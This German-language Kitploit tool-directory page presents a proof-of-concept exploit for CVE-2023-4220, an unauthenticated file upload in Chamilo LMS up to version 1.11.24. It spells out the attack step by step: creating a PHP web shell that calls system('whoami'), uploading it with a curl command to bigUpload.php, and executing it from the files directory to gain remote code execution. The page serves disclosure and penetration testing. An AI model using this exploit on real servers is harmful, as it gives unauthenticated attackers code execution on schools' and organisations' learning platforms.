Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Chamilo-LMS-Unauthenticated-File-Upload-CVE-2023-4220 — Proof-of-Concept-Exploit für CVE-2023-4220: nicht authentifizierter Datei-Upload in Chamilo LMS, der gespeichertes XSS und Remote-Code-Ausführung über Web-Shell-Bereitstellung ermöglicht. | Kitploit
Tools/GitHubGitHub/dollarboysushil/chamilo-lms-unauthenticated-file-upload-cve-2023-4220
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubdollarboysushil/chamilo-lms-unauthenticated-file-upload-cve-2023-4220

Chamilo-LMS-Unauthenticated-File-Upload-CVE-2023-4220

Proof-of-Concept-Exploit für CVE-2023-4220: nicht authentifizierter Datei-Upload in Chamilo LMS, der gespeichertes XSS und Remote-Code-Ausführung über Web-Shell-Bereitstellung ermöglicht.

Repository anzeigenWebseite
1vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Chamilo-LMS-Unauthenticated-File-Upload-

Uneingeschränkter Datei-Upload in der Big-File-Upload-Funktionalität in /main/inc/lib/javascript/bigupload/inc/bigUpload.php in Chamilo LMS <= v1.11.24 erlaubt nicht authentifizierten Angreifern, gespeicherte Cross-Site-Scripting-Angriffe durchzuführen und Remote-Codeausführung durch das Hochladen einer Web-Shell zu erlangen.

Betroffene Version ≤v1.11.24

CVE-Kennung CVE-2023-4220

Zusammenfassung der Schwachstelle

Die Big-File-Upload-Funktionalität von /main/inc/lib/javascript/bigupload/inc/bigUpload.php erlaubt das Hochladen beliebiger Dateien in das Verzeichnis /main/inc/lib/javascript/bigupload/files innerhalb des Web-Roots.

Proof-of-Concept

  • Falls das Verzeichnis /main/inc/lib/javascript/bigupload/files existiert, können wir eine beliebige Datei wie folgt hochladen:

  • Erstelle eine schädliche PHP-Datei echo '<?php system("whoami"); ?>' > dollarboysushil.php Untitled (1).png

  • Wir können diese Datei dann mit dem folgenden Befehl hochladen:

    root@kitploit:~
    `$ curl -F '[email protected]' 'http://<website>/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'` 
    

    Untitled (1).png

  • Wir können überprüfen, ob unsere Datei hochgeladen wurde, indem wir das Verzeichnis /main/inc/lib/javascript/bigupload/files aufrufen. Untitled (1).png

  • Und wir können sie ausführen, indem wir auf die PHP-Datei klicken, was die Ausgabe des Befehls whoami liefert. Untitled (1).png

Tool herunterladen